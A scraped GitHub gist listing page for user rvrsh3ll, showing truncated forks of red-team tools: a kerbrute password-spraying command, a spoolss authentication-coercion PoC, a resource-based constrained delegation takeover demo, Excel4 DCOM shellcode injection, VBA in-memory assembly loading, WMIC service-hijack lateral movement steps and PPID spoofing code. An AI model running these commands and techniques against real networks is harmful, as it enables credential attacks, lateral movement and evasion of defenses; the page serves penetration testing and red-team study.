With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Steve Borosh rvrsh3ll
rvrsh3ll
/ dementor.py
Created
January 16, 2019 13:55
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
rvrsh3ll
/ content_discovery_all.txt
Created
March 16, 2019 22:52
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ | |
| --- |
rvrsh3ll
/ rbcd_demo.ps1
Created
April 6, 2019 14:38
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
rvrsh3ll
/ LoadXSLFromMem.cs
Created
June 9, 2019 17:49
— forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace TryCOMXSLLoad | |
| { | |
| class Program |
rvrsh3ll
/ gist:81cef0f2b54ee62302a9bf3cd4ab6ab0
Created
August 8, 2019 22:14
— forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Useful Cypher queries for BloodHound
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
| RETURN u.name | |
| That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
| --------------- | |
| MATCH | |
| (U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) | |
| WITH | |
| U.name as n, |
rvrsh3ll
/ kerberos_attacks_cheatsheet.md
Created
August 28, 2019 01:52
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
rvrsh3ll
/ Invoke-Excel4DCOM64.ps1
Created
September 17, 2019 03:02
— forked from Philts/Invoke-Excel4DCOM64.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #********************************************************************** | |
| # Invoke-Excel4DCOM64.ps1 | |
| # Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support | |
| # Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason | |
| # Date: 2019/04/21 | |
| # Version: 1.1 | |
| #********************************************************************** | |
| function Invoke-Excel4DCOM | |
| { |
rvrsh3ll
/ mscorlib_load_assembly.vba
Created
October 3, 2019 00:38
— forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
rvrsh3ll
/ wmicLateralMovement.txt
Created
December 11, 2019 22:30
— forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
rvrsh3ll
/ PPID Spoof & BlockDLLs
Created
January 14, 2020 02:07
— forked from rasta-mouse/PPID Spoof & BlockDLLs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |